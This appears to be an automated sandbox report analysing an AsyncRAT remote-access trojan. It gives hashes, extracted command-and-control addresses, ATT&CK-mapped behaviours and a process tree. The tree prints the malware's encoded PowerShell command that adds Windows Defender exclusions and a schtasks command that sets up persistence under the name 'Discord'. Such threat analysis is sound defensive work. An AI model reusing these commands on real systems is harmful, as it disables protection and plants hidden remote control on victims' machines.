Analysis
-
max time kernel
60s -
max time network
52s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
-
submitted
20/04/2025, 19:00
General
-
Target
7b8f49ee16e33842749de6145dbec03a13ced02717ad905eee2d88e59718f455.exe
-
Size
1.3MB
-
MD5
b2176882f0392c4bf65d78beca48cb93
-
SHA1
30b824d0c169dd45272abb85e03573d19acbb416
-
SHA256
7b8f49ee16e33842749de6145dbec03a13ced02717ad905eee2d88e59718f455
-
SHA512
54b3bacc09848691c9b9f011d33e8e769673b49454bec3c546f86e353524831af72920f6b0ac66356e2b551957a6e304d480e7c256c9e1e2f22f9dba5ed4b013
-
SSDEEP
24576:2YVxlmFfqq4BNH8Ar3MVFGEkBvSbaliqOpr:txIWpRMV8PNxUr
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6666
127.0.0.1:30496
147.185.221.26:6666
147.185.221.26:30496
-
delay
2
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Async RAT payload 1 IoCs
-
Executes dropped EXE 3 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7b8f49ee16e33842749de6145dbec03a13ced02717ad905eee2d88e59718f455.exe"C:\Users\Admin\AppData\Local\Temp\7b8f49ee16e33842749de6145dbec03a13ced02717ad905eee2d88e59718f455.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAYgB0ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\GH Injector - x64.exe"C:\Users\Admin\AppData\Local\Temp\GH Injector - x64.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Discord.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CF7.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
871B
MD51569f2c982851def168a6a1dad27317a
SHA1cca0d9a1aca7b213c527efec865e1caee36fa127
SHA256fc9a4ce0e2bd7b632291798d9b436861bd9006b858ee148811201ebfe6458e26
SHA51278c9101c78f685829db5314a10f45485813b2ede4561facaa5f965d94077772a2e445610631be15230df27aaeacee08ddd4cd02a9398a5e3877e5b6c16bbe2c1
-
Filesize
342KB
MD511bca33947e3a77ec9dd7250805192b4
SHA1c7b4ccbcc1ade9b5a484fca7399cb383bb3d4ea0
SHA256dc860dd5a4ee1c7a3a3b4e6dbb77be0a3228bb4def6feac7953df212ab5bd519
SHA51273cdc8ecad08f1687a7afc8feab85a3de0ea9d88e139ad80bc6fe5b488b40c3ad04ff419d04275fcb8c7f5fba05005ab37ef8d638093e66085801fa1022326b3
-
Filesize
927KB
MD5fac188061068468b413905c05ffe4a2e
SHA1bc5159c4a2aabc8b138fd28da099c5c6e4e87c86
SHA25616ac233c0be5784cf4b3bb0b3c94a9732609c6725d3982736280f04195d5304a
SHA5123750a9e46d0d43e95e2369996661bc0c82511242c79d2aacd4e09455bba3abb8fa6eaf51880875d75cb920543108a5c8c8ebf6c0ea4fcf05a99eb40a6dd2357b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD5b2fea4b9882072ea9d97500d4bbfb933
SHA174cf46a2a2d8b77829591953993895241dd21e11
SHA2560d0456ba836332aed1fe213442a1c4f45e7712161c965fca141352d39fd2ed68
SHA512246cc8e25698fdb3f1ea9667797765bb47178d607c2050bb6860a1b7f29934f96db9ef8b3a653b04f490134b15d6019ad61292a74c943c2a1469c1e1974f105c
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
208KB
-
Filesize
6.5MB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.2MB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
656KB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
84KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
216KB
-
Filesize
8KB
-
Filesize
368KB